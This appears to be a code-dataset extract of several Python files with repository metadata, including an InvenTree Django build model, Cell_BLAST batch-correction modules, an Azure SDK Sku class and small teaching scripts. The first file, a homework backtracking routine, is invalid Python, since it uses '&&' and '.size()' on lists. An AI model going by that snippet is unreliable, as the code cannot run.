blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e99b1b904a183481565ed38808f38f03702f4e60 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2739/60825/244336.py | 391935b7e27570792c33d23a3858845f5b95b823 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | res=[]
def printAns(currList, currSum, target, k):
if(currSum==target&&currList.size()==k):
res.append(currList)
return
elif currSum>target||currList.size()>k:
return
else:
for i in range(currList[len(currList)-1], 9):
t=currList[:]
t.append(i)
printAns(t, currSum+i, target, k)
s=input()
k=int(s[0])
target=int(s[3:])
printAns([], 0, target, k)
print(res) | [
"[email protected]"
] | |
3e241bca87c1106e07b8d5ffd8e53da25cae808a | 8e1141fb8d9bf02d7e1c2fb887d66049d0860714 | /InvenTree/build/models.py | d09e7518785858212cb1d0f2ae5b953b0b916930 | [
"MIT"
] | permissive | ksanchezcld/InvenTree | 73ec392db5149814604e79690b465ae900af0c94 | ceea0533686305077c07c78ffa20ab4227ce2cf4 | refs/heads/master | 2023-02-28T10:07:02.741814 | 2018-05-12T02:44:29 | 2018-05-12T02:44:29 | 165,738,059 | 1 | 0 | MIT | 2023-02-11T19:31:42 | 2019-01-14T21:28:53 | JavaScript | UTF-8 | Python | false | false | 3,216 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.utils.translation import ugettext as _
from django.db import models
from django.core.validators import MinValueValidator
class Build(models.Model):
""" A Build object organises the creation of new parts from the component parts
It uses the part BOM to generate new parts.
Parts are then taken from stock
"""
def get_absolute_url(self):
return '/build/{pk}/'.format(pk=self.id)
# Build status codes
PENDING = 10 # Build is pending / active
HOLDING = 20 # Build is currently being held
CANCELLED = 30 # Build was cancelled
COMPLETE = 40 # Build is complete
BUILD_STATUS_CODES = {PENDING: _("Pending"),
HOLDING: _("Holding"),
CANCELLED: _("Cancelled"),
COMPLETE: _("Complete"),
}
batch = models.CharField(max_length=100, blank=True, null=True,
help_text='Batch code for this build output')
# Status of the build
status = models.PositiveIntegerField(default=PENDING,
choices=BUILD_STATUS_CODES.items(),
validators=[MinValueValidator(0)])
# Date the build model was 'created'
creation_date = models.DateField(auto_now=True, editable=False)
# Date the build was 'completed'
completion_date = models.DateField(null=True, blank=True)
# Brief build title
title = models.CharField(max_length=100, help_text='Brief description of the build')
# A reference to the part being built
# Only 'buildable' parts can be selected
part = models.ForeignKey('part.Part', on_delete=models.CASCADE,
related_name='builds',
limit_choices_to={'buildable': True},
)
# How many parts to build?
quantity = models.PositiveIntegerField(default=1,
validators=[MinValueValidator(1)],
help_text='Number of parts to build')
# Notes can be attached to each build output
notes = models.TextField(blank=True)
@property
def required_parts(self):
parts = []
for item in self.part.bom_items.all():
part = {'part': item.sub_part,
'per_build': item.quantity,
'quantity': item.quantity * self.quantity
}
parts.append(part)
return parts
@property
def can_build(self):
""" Return true if there are enough parts to supply build
"""
for item in self.required_parts:
if item['part'].total_stock < item['quantity']:
return False
return True
@property
def is_active(self):
""" Is this build active?
An active build is either:
- Pending
- Holding
"""
return self.status in [
self.PENDING,
self.HOLDING
]
@property
def is_complete(self):
return self.status == self.COMPLETE
| [
"[email protected]"
] | |
3b81da56caa93e61d28fabd2fb15cbe2d6049842 | af6feb644d2435e1d656556261e5e100209beb1c | /helper/show_pred.py | 3e501e41b0d01880007c112e02a8e8be86dcecf8 | [
"MIT"
] | permissive | liusida/TorchServe_FaceLandmark_Example | f2ca5d1e9cde2eed340ce46584a06cb0e16ef4ac | 1e854f2f82874255b59ca27b19d3a3254fe69636 | refs/heads/main | 2023-04-26T16:25:18.421724 | 2021-05-26T03:25:00 | 2021-05-26T03:25:00 | 370,864,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,081 | py | import collections
import matplotlib.pyplot as plt
def show_pred(preds, input_img, only_2d=True, filename=None):
# 2D-Plot
plot_style = dict(marker='o',
markersize=4,
linestyle='-',
lw=2)
pred_type = collections.namedtuple('prediction_type', ['slice', 'color'])
pred_types = {'face': pred_type(slice(0, 17), (0.682, 0.780, 0.909, 0.5)),
'eyebrow1': pred_type(slice(17, 22), (1.0, 0.498, 0.055, 0.4)),
'eyebrow2': pred_type(slice(22, 27), (1.0, 0.498, 0.055, 0.4)),
'nose': pred_type(slice(27, 31), (0.345, 0.239, 0.443, 0.4)),
'nostril': pred_type(slice(31, 36), (0.345, 0.239, 0.443, 0.4)),
'eye1': pred_type(slice(36, 42), (0.596, 0.875, 0.541, 0.3)),
'eye2': pred_type(slice(42, 48), (0.596, 0.875, 0.541, 0.3)),
'lips': pred_type(slice(48, 60), (0.596, 0.875, 0.541, 0.3)),
'teeth': pred_type(slice(60, 68), (0.596, 0.875, 0.541, 0.4))
}
fig = plt.figure(figsize=plt.figaspect(.5))
ax = fig.add_subplot(1, 1 if only_2d else 2, 1)
ax.imshow(input_img)
for pred_type in pred_types.values():
ax.plot(preds[pred_type.slice, 0],
preds[pred_type.slice, 1],
color=pred_type.color, **plot_style)
ax.axis('off')
if not only_2d:
# 3D-Plot
ax = fig.add_subplot(1, 2, 2, projection='3d')
surf = ax.scatter(preds[:, 0] * 1.2,
preds[:, 1],
preds[:, 2],
c='cyan',
alpha=1.0,
edgecolor='b')
for pred_type in pred_types.values():
ax.plot3D(preds[pred_type.slice, 0] * 1.2,
preds[pred_type.slice, 1],
preds[pred_type.slice, 2], color='blue')
ax.view_init(elev=90., azim=90.)
ax.set_xlim(ax.get_xlim()[::-1])
if filename:
plt.savefig(filename)
else:
plt.show()
| [
"[email protected]"
] | |
c97124271bc6733cf52b3bba45b66aac83594937 | c50598d4ce8e6c906748021060f1df84e16372ca | /Cell_BLAST/rmbatch.py | 655f033ddd7728aabe6e52fbaf541a4df57fa836 | [
"MIT"
] | permissive | BacemDataScience/Cell_BLAST | f4407571e321fbc6aeb8642a994767e6e1f381fa | d0e25fa695cb8cebcba68dd32fe5e7e96743803f | refs/heads/master | 2020-09-10T02:31:00.758648 | 2019-09-28T16:06:55 | 2019-09-28T16:06:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,479 | py | """
Batch effect removing modules for DIRECTi
"""
import tensorflow as tf
from . import nn
from . import module
from . import utils
class RMBatch(module.Module):
"""
Parent class for systematical bias / batch effect removal modules.
"""
def __init__(self, batch_dim, delay=20, name="RMBatch"):
super(RMBatch, self).__init__(name=name)
self.batch_dim = batch_dim
self.delay = delay
if self._delay_guard not in self.on_epoch_end:
self.on_epoch_end.append(self._delay_guard)
def _build_regularizer(self, input_tensor, training_flag, epoch, scope=""):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
return 0.0
def _build_feed_dict(self, data_dict):
return {
self.batch: utils.densify(data_dict[self.name])
} if self.name in data_dict else {}
def __bool__(self):
return True
def _get_config(self):
return {
"batch_dim": self.batch_dim,
"delay": self.delay,
**super(RMBatch, self)._get_config()
}
def _delay_guard(self, model, train_data_dict, val_data_dict, loss):
_epoch = model.sess.run(model.epoch)
return _epoch >= self.delay
class Adversarial(RMBatch):
"""
Build a batch effect correction module that uses adversarial batch alignment.
Parameters
----------
batch_dim : int
Number of batches.
h_dim : int
Dimensionality of the hidden layers in the discriminator MLP, by default 128.
depth : int
Number of hidden layers in the discriminator MLP, by default 1.
dropout : float
Dropout rate, by default 0.0.
lambda_reg : float
Strength of batch effect correction, by default 0.01,
n_steps : int
How many discriminator steps to run for each encoder step, by default 1.
name : str
Name of the module, by default "AdvBatch".
"""
def __init__(self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, delay=20, name="AdvBatch"):
super(Adversarial, self).__init__(batch_dim, delay=delay, name=name)
self.h_dim = h_dim
self.depth = depth
self.dropout = dropout
self.lambda_reg = lambda_reg
self.n_steps = n_steps
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="d_loss"
)
self.batch_g_loss = tf.negative(self.batch_d_loss, name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
def _compile(self, optimizer, lr):
with tf.variable_scope("optimize/%s" % self.scope_safe_name):
optimizer = getattr(tf.train, optimizer)(lr)
control_dependencies = []
for _ in range(self.n_steps):
with tf.control_dependencies(control_dependencies):
self.step = optimizer.minimize(
self.lambda_reg * self.batch_d_loss,
var_list=tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES,
self.build_regularizer_scope
)
)
control_dependencies = [self.step]
tf.add_to_collection(tf.GraphKeys.UPDATE_OPS, self.step)
def _get_config(self):
return {
"h_dim": self.h_dim,
"depth": self.depth,
"dropout": self.dropout,
"lambda_reg": self.lambda_reg,
"n_steps": self.n_steps,
**super(Adversarial, self)._get_config()
}
class MNN(RMBatch):
"""
Build a batch effect correction module that uses mutual nearest neighbor
(MNN) distance regularization.
Parameters
----------
batch_dim : int
Number of batches.
n_neighbors : int
Number of nearest neighbors to use when selecting mutual nearest
neighbors, by default 5.
lambda_reg : float
Strength of batch effect correction, by default 1.0,
delay : int
How many epoches to delay before using MNN batch correction,
by default 20.
name : str
Name of the module, by default "MNNBatch".
"""
def __init__(
self, batch_dim, n_neighbors=5, lambda_reg=1.0,
delay=20, name="MNN"
):
super(MNN, self).__init__(batch_dim, delay=delay, name=name)
self.n_neighbors = n_neighbors
self.lambda_reg = lambda_reg
def _build_regularizer(self, input_tensor, training_flag, epoch, scope="MNN"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(dtype=tf.float32, shape=(
None, self.batch_dim
), name=self.scope_safe_name)
with tf.name_scope("%s/%s" % (scope, self.scope_safe_name)):
batches = tf.dynamic_partition(
input_tensor,
partitions=tf.argmax(self.batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(batch)[0] > 0 for batch in batches]
penalties = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
penalties.append(tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._cross_batch_penalty(batches[i], batches[j]),
lambda: tf.zeros((0,))
))
penalties = tf.concat(penalties, axis=0)
return tf.cast(
epoch > self.delay, tf.float32
) * self.lambda_reg * tf.reduce_mean(penalties, name="MNN_loss")
def _cross_batch_penalty(self, x, y): # MNN
x1, y0 = tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=0)
xy_dist = tf.reduce_sum(tf.square(x1 - y0), axis=2)
xy_mask = tf.cast(self._mnn_mask(xy_dist, self.n_neighbors), tf.float32)
return tf.reshape(xy_dist * xy_mask, [-1])
@staticmethod
def _neighbor_mask(d, k):
n = tf.shape(d)[1]
_, idx = tf.nn.top_k(tf.negative(d), k=tf.minimum(k, n))
return tf.cast(tf.reduce_sum(tf.one_hot(idx, depth=n), axis=1), tf.bool)
@staticmethod
def _mnn_mask(d, k):
return tf.logical_and(
MNN._neighbor_mask(d, k),
tf.transpose(MNN._neighbor_mask(tf.transpose(d), k))
)
def _get_config(self):
return {
"n_neighbors": self.n_neighbors,
"lambda_reg": self.lambda_reg,
**super(MNN, self)._get_config()
}
class MNNAdversarial(Adversarial, MNN):
"""
Build a batch effect correction module that uses adversarial batch alignment
among cells with mutual nearest neighbors.
Parameters
----------
batch_dim : int
Number of batches.
h_dim : int
Dimensionality of the hidden layers in the discriminator MLP, by default 128.
depth : int
Number of hidden layers in the discriminator MLP, by default 1.
dropout : float
Dropout rate, by default 0.0.
lambda_reg : float
Strength of batch effect correction, by default 0.01,
n_steps : int
How many discriminator steps to run for each encoder step, by default 1.
n_neighbors : int
Number of nearest neighbors to use when selecting mutual nearest
neighbors, by default 5.
delay : int
How many epoches to delay before using MNN batch correction,
by default 20.
name : str
Name of the module, by default "MNNAdvBatch".
"""
def __init__(
self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, n_neighbors=5, delay=20,
name="MNNAdvBatch"
):
super(MNNAdversarial, self).__init__(
batch_dim, h_dim, depth, dropout, lambda_reg, n_steps,
delay=delay, name=name
) # Calls Adversarial.__init__
self.n_neighbors = n_neighbors
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
input_idx = tf.expand_dims(tf.cast(
tf.range(tf.shape(input_tensor)[0]), tf.float32
), axis=1)
_input_tensor = tf.concat([input_idx, input_tensor], axis=1)
batches = tf.dynamic_partition(
_input_tensor,
partitions=tf.argmax(batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(item)[0] > 0 for item in batches]
batches = [(item[:, 0], item[:, 1:]) for item in batches]
include_idx = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
include_idx.append(tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._mnn_idx(batches[i], batches[j], self.n_neighbors),
lambda: (tf.zeros((0,)), tf.zeros((0,)))
))
include_idx = [j for i in include_idx for j in i] # flatten
self.include_idx = tf.unique(tf.cast(
tf.concat(include_idx, axis=0), tf.int32))[0]
input_tensor = tf.gather(input_tensor, self.include_idx)
batch = tf.gather(batch, self.include_idx)
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.multiply(tf.cast(
epoch >= self.delay, tf.float32
), tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="raw_d_loss"
), name="d_loss")
self.batch_g_loss = tf.negative(self.batch_d_loss, name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
@staticmethod
def _mnn_idx(batch1, batch2, k):
(xi, x), (yi, y) = batch1, batch2
x1, y0 = tf.expand_dims(x, axis=1), tf.expand_dims(y, axis=0)
xy_dist = tf.reduce_sum(tf.square(x1 - y0), axis=2)
xy_mask = tf.cast(MNNAdversarial._mnn_mask(xy_dist, k), tf.int32)
return (
tf.dynamic_partition(xi, tf.cast(
tf.reduce_sum(xy_mask, axis=1) > 0, tf.int32
), 2)[1],
tf.dynamic_partition(yi, tf.cast(
tf.reduce_sum(xy_mask, axis=0) > 0, tf.int32
), 2)[1]
)
# EXPERIMENTAL
class AdaptiveMNNAdversarial(MNNAdversarial):
def __init__(
self, batch_dim, h_dim=128, depth=1, dropout=0.0,
lambda_reg=0.01, n_steps=1, n_neighbors=5, delay=20,
name="AdptMNNAdvBatch"
):
super(AdaptiveMNNAdversarial, self).__init__(
batch_dim, h_dim, depth, dropout, lambda_reg, n_steps, n_neighbors,
delay=delay, name=name
)
def _build_regularizer(self, input_tensor, training_flag,
epoch, scope="discriminator"):
with tf.name_scope("placeholder/"):
self.batch = tf.placeholder(
dtype=tf.float32, shape=(None, self.batch_dim),
name=self.scope_safe_name
)
self.build_regularizer_scope = "%s/%s" % (scope, self.scope_safe_name)
with tf.variable_scope(self.build_regularizer_scope):
# Select cells with batch identity
mask = tf.cast(tf.reduce_sum(self.batch, axis=1) > 0, tf.int32)
batch = tf.dynamic_partition(self.batch, mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, mask, 2)[1]
# Build MNN mask
n = tf.shape(batch)[0]
input_idx = tf.expand_dims(tf.cast(tf.range(n), tf.float32), axis=1)
_input_tensor = tf.concat([input_idx, input_tensor], axis=1)
batches = tf.dynamic_partition(
_input_tensor,
partitions=tf.argmax(batch, axis=1, output_type=tf.int32),
num_partitions=self.batch_dim
)
use_flags = [tf.shape(item)[0] > 0 for item in batches]
batches = [(item[:, 0], item[:, 1:]) for item in batches]
self.mask_mat = []
for i in range(len(batches)):
for j in range(i + 1, len(batches)):
idx_mask = tf.cond(
tf.logical_and(use_flags[i], use_flags[j]),
lambda i=i, j=j: self._mnn_idx_mask(
batches[i], batches[j], self.n_neighbors, n),
lambda: tf.zeros((n,))
)
idx_mask = tf.expand_dims(idx_mask, axis=1)
self.mask_mat.append(tf.concat([
tf.zeros((n, i)), idx_mask,
tf.zeros((n, j - i - 1)), idx_mask,
tf.zeros((n, self.batch_dim - j - 1))
], axis=1))
self.mask_mat = tf.cast(tf.add_n(self.mask_mat) > 0, tf.int32)
include_mask = tf.cast(tf.reduce_sum(
self.mask_mat, axis=1
) > 0, tf.int32)
self.mask_mat = tf.dynamic_partition(self.mask_mat, include_mask, 2)[1]
batch = tf.dynamic_partition(batch, include_mask, 2)[1]
input_tensor = tf.dynamic_partition(input_tensor, include_mask, 2)[1]
# Distriminator loss
batch_pred = tf.identity(nn.dense(nn.mlp(
input_tensor, [self.h_dim] * self.depth,
dropout=self.dropout, training_flag=training_flag
), self.batch_dim), "batch_logit")
self.batch_d_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.reduce_mean(
tf.nn.softmax_cross_entropy_with_logits_v2(
labels=batch, logits=batch_pred
), name="d_loss"
)
# Generator loss
self.batch_g_loss = tf.cast(
epoch >= self.delay, tf.float32
) * tf.negative(tf.reduce_mean(tf.scan(
self._masked_softmax_cross_entropy_with_logits,
(batch, batch_pred, self.mask_mat),
tf.zeros(()), parallel_iterations=128
)), name="g_loss")
self.vars_to_save += tf.get_collection(
tf.GraphKeys.GLOBAL_VARIABLES, self.build_regularizer_scope)
tf.add_to_collection(tf.GraphKeys.LOSSES, self.batch_d_loss)
return self.lambda_reg * self.batch_g_loss
@staticmethod
def _mnn_idx_mask(batch1, batch2, k, n):
idx1, idx2 = AdaptiveMNNAdversarial._mnn_idx(batch1, batch2, k)
idx = tf.cast(tf.concat([idx1, idx2], axis=0), tf.int32)
return tf.reduce_sum(tf.one_hot(idx, depth=n), axis=0)
@staticmethod
def _masked_softmax_cross_entropy_with_logits(cum, tensors):
labels, logits, mask = tensors
labels = tf.dynamic_partition(labels, mask, 2)[1]
logits = tf.dynamic_partition(logits, mask, 2)[1]
return tf.reduce_sum(labels * (tf.reduce_logsumexp(logits) - logits))
| [
"[email protected]"
] | |
b57127734749739690a92ea4af6da4fa3a1d9bd5 | 50948d4cb10dcb1cc9bc0355918478fb2841322a | /azure-mgmt-storage/azure/mgmt/storage/v2017_06_01/models/sku_py3.py | 8bb382d6481045d2cc41fe140e170b08d4bbffa6 | [
"MIT"
] | permissive | xiafu-msft/azure-sdk-for-python | de9cd680b39962702b629a8e94726bb4ab261594 | 4d9560cfd519ee60667f3cc2f5295a58c18625db | refs/heads/master | 2023-08-12T20:36:24.284497 | 2019-05-22T00:55:16 | 2019-05-22T00:55:16 | 187,986,993 | 1 | 0 | MIT | 2020-10-02T01:17:02 | 2019-05-22T07:33:46 | Python | UTF-8 | Python | false | false | 3,319 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class Sku(Model):
"""The SKU of the storage account.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param name: Required. Gets or sets the sku name. Required for account
creation; optional for update. Note that in older versions, sku name was
called accountType. Possible values include: 'Standard_LRS',
'Standard_GRS', 'Standard_RAGRS', 'Standard_ZRS', 'Premium_LRS'
:type name: str or ~azure.mgmt.storage.v2017_06_01.models.SkuName
:ivar tier: Gets the sku tier. This is based on the SKU name. Possible
values include: 'Standard', 'Premium'
:vartype tier: str or ~azure.mgmt.storage.v2017_06_01.models.SkuTier
:ivar resource_type: The type of the resource, usually it is
'storageAccounts'.
:vartype resource_type: str
:ivar kind: Indicates the type of storage account. Possible values
include: 'Storage', 'BlobStorage'
:vartype kind: str or ~azure.mgmt.storage.v2017_06_01.models.Kind
:ivar locations: The set of locations that the SKU is available. This will
be supported and registered Azure Geo Regions (e.g. West US, East US,
Southeast Asia, etc.).
:vartype locations: list[str]
:ivar capabilities: The capability information in the specified sku,
including file encryption, network acls, change notification, etc.
:vartype capabilities:
list[~azure.mgmt.storage.v2017_06_01.models.SKUCapability]
:param restrictions: The restrictions because of which SKU cannot be used.
This is empty if there are no restrictions.
:type restrictions:
list[~azure.mgmt.storage.v2017_06_01.models.Restriction]
"""
_validation = {
'name': {'required': True},
'tier': {'readonly': True},
'resource_type': {'readonly': True},
'kind': {'readonly': True},
'locations': {'readonly': True},
'capabilities': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'SkuName'},
'tier': {'key': 'tier', 'type': 'SkuTier'},
'resource_type': {'key': 'resourceType', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'Kind'},
'locations': {'key': 'locations', 'type': '[str]'},
'capabilities': {'key': 'capabilities', 'type': '[SKUCapability]'},
'restrictions': {'key': 'restrictions', 'type': '[Restriction]'},
}
def __init__(self, *, name, restrictions=None, **kwargs) -> None:
super(Sku, self).__init__(**kwargs)
self.name = name
self.tier = None
self.resource_type = None
self.kind = None
self.locations = None
self.capabilities = None
self.restrictions = restrictions
| [
"[email protected]"
] | |
daa712434a43b1506008cb02c38d0182d39483c2 | b9c55de2b21ca781ab5522da8a1db34ed55bd644 | /django-app/member/urls.py | cee47f79b216288c4dad0072c53238b1df7520be | [] | no_license | JeongEuiJin/model-wed-p | 04a8ed2aa8145a860e214c563fcebae9d7e39692 | 9fb987f5fe65c05825c519d6ef4bd4d802e0dccb | refs/heads/master | 2021-01-21T21:05:07.169721 | 2017-06-19T12:11:51 | 2017-06-19T12:11:51 | 94,772,729 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.student_list, name='student_list'),
url(r'^(?P<s_pk>\d+)/$', views.student_del, name='student_del')
]
| [
"[email protected]"
] | |
e789385cd300ec837af0be820f02f87154600e1d | 8a4a4cab76ddf1b19a017c3e5c765caf9a5fe3cc | /test/test_remote_app_permission_update_user.py | 45ffee2297dddce630ab3389a4f5adc204e15ffc | [] | no_license | ibuler/testsdk | fa724ff129e2a6144c05b8330cd4014c8bfb9a58 | 015bc6ca7da64180a2a11756a4e7cce733aca806 | refs/heads/master | 2020-06-23T09:02:50.322517 | 2019-07-25T05:51:26 | 2019-07-25T05:51:26 | 198,577,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,020 | py | # coding: utf-8
"""
Jumpserver API Docs
Jumpserver Restful api docs # noqa: E501
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.remote_app_permission_update_user import RemoteAppPermissionUpdateUser # noqa: E501
from swagger_client.rest import ApiException
class TestRemoteAppPermissionUpdateUser(unittest.TestCase):
"""RemoteAppPermissionUpdateUser unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testRemoteAppPermissionUpdateUser(self):
"""Test RemoteAppPermissionUpdateUser"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.remote_app_permission_update_user.RemoteAppPermissionUpdateUser() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
2fafa7209aecd8c1e4b79ff259093980bd081564 | b9a73fe404ee30baf8a88276030363ad2d1d4cc5 | /old/BRNN_Gap/eval.py | d8cfef3415e874b7220fbd604a5df6822553a2ff | [] | no_license | everglowing/Language-Models | 06da6befceef9b4fd1f43ba7d6708fcf8862f715 | 67db3fc5d0b0ef099cac306bd78294764d3587cf | refs/heads/master | 2021-01-13T04:12:41.341299 | 2016-12-27T18:53:24 | 2016-12-27T18:53:24 | 77,684,222 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,473 | py | from __future__ import print_function
import numpy as np
import tensorflow as tf
import argparse
import codecs
import time
import os
from six.moves import cPickle
from utils import TextLoader
from model import Model
from six import text_type
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--save_dir', type=str, default='save',
help='model directory to store checkpointed models')
parser.add_argument('--text', type=str,
help='filename of text to evaluate on')
args = parser.parse_args()
eval(args)
def eval(args):
with open(os.path.join(args.save_dir, 'config.pkl'), 'rb') as f:
saved_args = cPickle.load(f)
saved_args.batch_size = 1
saved_args.seq_length = 200
with open(os.path.join(args.save_dir, 'chars_vocab.pkl'), 'rb') as f:
chars, vocab = cPickle.load(f)
model = Model(saved_args, infer=False, evaluation=True)
with codecs.open(args.text, 'r', encoding='utf-8') as f:
text = f.read()
with tf.Session() as sess:
tf.initialize_all_variables().run()
saver = tf.train.Saver(tf.all_variables())
ckpt = tf.train.get_checkpoint_state(args.save_dir)
if ckpt and ckpt.model_checkpoint_path:
saver.restore(sess, ckpt.model_checkpoint_path)
ppl = model.eval(sess, chars, vocab, text)
print('perplexity: {0}'.format(ppl))
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
cedcb016825d6154f200e7ccfe1d53847c674bb6 | 9512f329d9326ed0b9436202947de9eee0c6c387 | /Cap07-estruturas_de_repeticao/for_03.py | dcfe65ac3989ce9551d9ca9f6b3a0ccdf9f82056 | [] | no_license | frclasso/CodeGurus_Python_mod1-turma1_2019 | 9fffd76547256ac480db41536223682a5b152944 | e34d60498ee45566dbf1182551d91250a9aab272 | refs/heads/master | 2020-04-30T02:01:50.757611 | 2019-06-10T15:38:58 | 2019-06-10T15:38:58 | 176,546,912 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # loop aninhado
lot_2D = [
['Toyota', 'Audi', 'BMW'],
['Lexus', 'Jeep'],
['Honda', 'Kia', 'Mazda']
]
#print(lot_2D[0][0]) # lista 0 , elemento 0 da lista 0
# for linha in lot_2D:
# for carro in linha:
# print(carro)
lot_3D =[
[
['Tesla', 'Fiat', 'BMW'],
['Honda', 'Jeep'],
['Saab','Kia', 'Ford']
],
[
['Subaru', 'Nissan'],
['Volkswagen'],
['Mercedez']
],
[
['Chevrolet', 'GMC'],
['Ferrari', 'Lamborghini']
]
]
#print(lot_3D[0])
# print(lot_3D[0][0])
#print(lot_3D[0][0][1])
for grupo in lot_3D:
for line in grupo:
for carro in line:
print(carro) | [
"[email protected]"
] | |
